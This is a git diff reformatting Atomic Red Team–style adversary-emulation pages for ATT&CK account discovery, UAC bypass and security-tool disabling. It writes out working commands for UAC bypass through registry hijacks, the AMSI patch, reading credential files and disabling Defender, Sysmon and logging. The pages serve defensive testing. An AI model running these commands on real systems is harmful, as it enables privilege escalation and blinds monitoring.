users. ### Linux -On Linux, local users can be enumerated through the use of the /etc/passwd file which is world readable. In mac, this same file is only used in single-user mode in addition to the /etc/master.passwd file. +On Linux, local users can be enumerated through the use of the /etc/passwd file which is world readable. In +mac, this same file is only used in single-user mode in addition to the /etc/master.passwd file. Also, groups can be enumerated through the groups and id commands. ### Office 365 and Azure AD -With authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) +With authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember +PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft +msolrolemember)(Citation: GitHub Raindance) -Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) +Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The +command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black +Hills Red Teaming MS AD Azure, 2018) -The Get-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+The Get-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a +domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking +Exchange MailSniper, 2016) ## Atomic Tests @@ -48,185 +63,130 @@ The Get-GlobalAddressList PowerShell cmdlet can be used to obtain e - [Atomic Test #11 - Enumerate logged on users via PowerShell](#atomic-test-11---enumerate-logged-on-users-via-powershell) -
## Atomic Test #1 - Enumerate all accounts + Enumerate all accounts by copying /etc/passwd to another file **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cat /etc/passwd > #{output_file} ``` - - - - -

## Atomic Test #2 - View sudoers access + (requires root) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cat /etc/sudoers > #{output_file} ``` - - - - -

## Atomic Test #3 - View accounts with UID 0 + View accounts wtih UID 0 **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh grep 'x:0:' /etc/passwd > #{output_file} ``` - - - - -

## Atomic Test #4 - List opened files by user + List opened files by user **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username ``` - - - - -

## Atomic Test #5 - Show if a user account has ever logged in remotely + Show if a user account has ever logged in remotely **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh lastlog > #{output_file} ``` - - - - -

## Atomic Test #6 - Enumerate users and groups + Utilize groups and id to enumerate users and groups **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh groups id ``` - - - - -

## Atomic Test #7 - Enumerate users and groups + Utilize local utilities to enumerate users and groups **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh dscl . list /Groups @@ -236,26 +196,17 @@ dscacheutil -q group dscacheutil -q user ``` - - - - -

## Atomic Test #8 - Enumerate all accounts + Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net user @@ -266,25 +217,16 @@ net localgroup "Users" net localgroup ``` - - - - -

## Atomic Test #9 - Enumerate all accounts via PowerShell + Enumerate all accounts via PowerShell **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell net user @@ -300,57 +242,34 @@ get-localgroup net localgroup ``` - - - - -

## Atomic Test #10 - Enumerate logged on users + Enumerate logged on users **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd query user ``` - - - - -

## Atomic Test #11 - Enumerate logged on users via PowerShell + Enumerate logged on users via PowerShell **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell query user ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1088.md b/Atomic_Threat_Coverage/Triggers/T1088.md index a9c7b962..12723b4d 100644 --- a/Atomic_Threat_Coverage/Triggers/T1088.md +++ b/Atomic_Threat_Coverage/Triggers/T1088.md @@ -1,14 +1,28 @@ # T1088 - Bypass User Account Control + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1088) +
Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) -If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected. +If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed +to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification +box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a +specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory +which would typically require elevated access. Malicious software may also be injected into a trusted process to gain +elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to +elevate privileges to administrator if the target process is unprotected. -Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: +Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of +methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive +list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: -* eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit) +* eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC + Bypass) (Citation: Fortinet Fareit) -Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)
+Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator +privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process +running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC +Bypass) ## Atomic Tests @@ -24,26 +38,23 @@ Another bypass is possible through some Lateral Movement techniques if credentia - [Atomic Test #6 - Bypass UAC by Mocking Trusted Directories](#atomic-test-6---bypass-uac-by-mocking-trusted-directories) -
## Atomic Test #1 - Bypass UAC using Event Viewer (cmd) -Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here +- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f @@ -51,34 +62,29 @@ cmd.exe /c eventvwr.msc ``` #### Cleanup Commands: + ```cmd reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 ``` - - - -

## Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell) -PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More +information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force @@ -87,33 +93,27 @@ Start-Process "C:\Windows\System32\eventvwr.msc" ``` #### Cleanup Commands: + ```powershell Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore ``` - - - -

## Atomic Test #3 - Bypass UAC using Fodhelper + Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f @@ -122,33 +122,28 @@ fodhelper.exe ``` #### Cleanup Commands: + ```cmd reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 ``` - - - -

## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell -PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - -**Supported Platforms:** Windows - +PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires +Windows 10. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force @@ -158,34 +153,28 @@ Start-Process "C:\Windows\System32\fodhelper.exe" ``` #### Cleanup Commands: + ```powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore ``` - - - -

## Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell) + PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 Upon execution administrative command prompt should open **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force @@ -195,34 +184,30 @@ Start-Process "C:\Windows\System32\ComputerDefaults.exe" ``` #### Cleanup Commands: + ```powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore ``` - - - -

## Atomic Test #6 - Bypass UAC by Mocking Trusted Directories -Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems -Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch - -**Supported Platforms:** Windows - +Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched +systems +Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console +should launch +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd mkdir "\\?\C:\Windows \System32\" @@ -231,13 +216,10 @@ mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe" ``` #### Cleanup Commands: + ```cmd rd "\\?\C:\Windows \" /S /Q >nul 2>nul del "c:\testbypass.exe" >nul 2>nul ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1089.md b/Atomic_Threat_Coverage/Triggers/T1089.md index a34c2659..ce26a13f 100644 --- a/Atomic_Threat_Coverage/Triggers/T1089.md +++ b/Atomic_Threat_Coverage/Triggers/T1089.md @@ -1,5 +1,7 @@ # T1089 - Disabling Security Tools + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1089) +
Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
## Atomic Tests @@ -44,20 +46,15 @@ - [Atomic Test #20 - Remove Windows Defender Definition Files](#atomic-test-20---remove-windows-defender-definition-files) -
## Atomic Test #1 - Disable iptables firewall + Disables the iptables firewall **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; @@ -72,25 +69,16 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; fi ``` - - - - -

## Atomic Test #2 - Disable syslog + Disables syslog collection **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; @@ -103,25 +91,16 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; fi ``` - - - - -

## Atomic Test #3 - Disable Cb Response + Disable the Cb Response service **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; @@ -134,133 +113,91 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; fi ``` - - - - -

## Atomic Test #4 - Disable SELinux + Disables SELinux enforcement **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh setenforce 0 ``` - - - - -

## Atomic Test #5 - Disable Carbon Black Response + Disables Carbon Black Response **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist ``` - - - - -

## Atomic Test #6 - Disable LittleSnitch + Disables LittleSnitch **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist ``` - - - - -

## Atomic Test #7 - Disable OpenDNS Umbrella + Disables OpenDNS Umbrella **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist ``` - - - - -

## Atomic Test #8 - Unload Sysmon Filter Driver -Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, + +Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o +verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd fltmc.exe unload #{sysmon_driver} ``` #### Cleanup Commands: + ```cmd sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -268,116 +205,121 @@ sysmon -i -accepteula -i > nul 2>&1 %temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Sysmon must be downloaded + ##### Check Prereq Commands: + ```powershell if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } ``` + ##### Get Prereq Commands: + ```powershell Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force ``` + ##### Description: sysmon must be Installed + ##### Check Prereq Commands: + ```powershell if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } ``` + ##### Get Prereq Commands: + ```powershell if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} ``` + ##### Description: sysmon filter must be loaded + ##### Check Prereq Commands: + ```powershell if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } ``` + ##### Get Prereq Commands: + ```powershell sysmon -u sysmon -accepteula -i ``` - - -

## Atomic Test #9 - Disable Windows IIS HTTP Logging + Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | website_name | The name of the website on a server | string | Default Web Site| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true ``` #### Cleanup Commands: + ```powershell C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false ``` - - - -

## Atomic Test #10 - Uninstall Sysmon + Uninstall Sysinternals Sysmon for Defense Evasion **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1089\bin\sysmon.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sysmon -u ``` #### Cleanup Commands: + ```cmd sysmon -i -accepteula >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Sysmon executable must be available + ##### Check Prereq Commands: + ```powershell if(cmd /c where sysmon) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null @@ -385,96 +327,82 @@ Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} ``` + ##### Description: Sysmon must be installed + ##### Check Prereq Commands: + ```powershell if(cmd /c sc query sysmon) { exit 0} else { exit 1} ``` + ##### Get Prereq Commands: + ```powershell cmd /c sysmon -i -accepteula ``` - - -

## Atomic Test #11 - AMSI Bypass - AMSI InitFailed + Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` #### Cleanup Commands: + ```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false) -ErrorAction Ignore ``` - - - -

## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key -With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. + +With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to +disable AMSI inspection. This test removes the Windows Defender provider registry key. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse ``` #### Cleanup Commands: + ```powershell New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null ``` - - - -

## Atomic Test #13 - Disable Arbitrary Security Windows Service + With administrative rights, an adversary can disable Windows Services related to security products. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | The name of the service to stop | String | McAfeeDLPAgentService| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd net.exe stop #{service_name} @@ -482,31 +410,24 @@ sc.exe config #{service_name} start= disabled ``` #### Cleanup Commands: + ```cmd sc.exe config #{service_name} start= auto >nul 2>&1 net.exe start #{service_name} >nul 2>&1 ``` - - - -

## Atomic Test #14 - Disable PowerShell Script Block Logging + An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. Credit to Matt Graeber (@mattifestation) for the research. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static') @@ -516,6 +437,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] ``` #### Cleanup Commands: + ```powershell $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static') $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null) @@ -523,51 +445,35 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1 $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1 ``` - - - -

## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface + An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. Credit to Matt Graeber (@mattifestation) for the research. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` - - - - -

## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell -Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled + +Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat +Protection will show as disabled in Windows settings. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Set-MpPreference -DisableRealtimeMonitoring 1 @@ -577,6 +483,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 1 ``` #### Cleanup Commands: + ```powershell Set-MpPreference -DisableRealtimeMonitoring 0 Set-MpPreference -DisableBehaviorMonitoring 0 @@ -584,25 +491,19 @@ Set-MpPreference -DisableScriptScanning 0 Set-MpPreference -DisableBlockAtFirstSeen 0 ``` - - - -

## Atomic Test #17 - Tamper with Windows Defender Command Prompt -Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. -However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. - -**Supported Platforms:** Windows +Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, +so they still fail as administrator. +However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad +things going on. +**Supported Platforms:** Windows - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sc stop WinDefend @@ -611,62 +512,49 @@ sc query WinDefend ``` #### Cleanup Commands: + ```cmd sc start WinDefend >nul 2>&1 sc config WinDefend start=enabled >nul 2>&1 ``` - - - -

## Atomic Test #18 - Tamper with Windows Defender Registry -Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be + +Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and +Threat protection window in Settings will be grayed out and have no info. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 ``` #### Cleanup Commands: + ```powershell Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 ``` - - - -

## Atomic Test #19 - Disable Microft Office Security Features -Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not -show any warning before editing the document +Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will +not +show any warning before editing the document https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel" @@ -679,41 +567,31 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" ``` - - - -

## Atomic Test #20 - Remove Windows Defender Definition Files -Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. -On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the + +Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all +arguments. +On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older +versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1090.md b/Atomic_Threat_Coverage/Triggers/T1090.md index cded5228..981c6e7a 100644 --- a/Atomic_Threat_Coverage/Triggers/T1090.md +++ b/Atomic_Threat_Coverage/Triggers/T1090.md @@ -1,10 +1,20 @@ # T1090 - Connection Proxy + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090) +
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. -External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the internet and then the proxy would forward communications to the C2 server. +External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port +redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased +infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low +likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate 